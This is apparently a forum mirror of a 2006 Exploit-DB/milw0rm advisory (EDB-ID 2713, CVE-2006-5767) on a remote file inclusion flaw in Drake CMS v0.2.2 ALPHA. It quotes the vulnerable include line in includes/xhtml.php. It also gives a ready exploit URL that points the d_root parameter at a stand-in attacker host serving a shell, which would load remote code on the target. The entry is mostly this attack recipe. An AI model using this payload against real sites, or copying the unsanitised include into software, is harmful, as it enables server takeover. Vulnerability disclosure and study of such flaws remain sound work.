- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2713
- Проверка EDB
-
- Пройдено
- Автор
- GREGSTAR
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-5767
- Дата публикации
- 2006-11-04
Код:
**********************************************************************************************************
Coding 4 Fun (c4f.pl)
**********************************************************************************************************
* Drake CMS v0.2.2 ALPHA rev.846 (http://drakecms.org) ;
* Class = Remote File Inclusion ;
* Download = https://sourceforge.net/project/showfiles.php?group_id=166901&package_id=192077&release_id=420102 ;
* Found by = GregStar (gregstar[at]c4f[dot]pl) ;
-------------------------------------------------------------------------------------------------------------------
- Vulnerable Code in "includes/xhtml.php" :
include $d_root.'classes/kses.php';
++++++++++++++++++++++++++++++++++++++++++++
- Exploit:
http://[target]/[path]/includes/xhtml.php?d_root=http://evilsite.com/shell?
------------------------------------------------------------------------------------------------------------------
Gr33tz: sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,RFL,d3m0n,java,reyw,kw@ch and for all friends.
**************************************************************************************************************
# milw0rm.com [2006-11-04]- Источник
- www.exploit-db.com
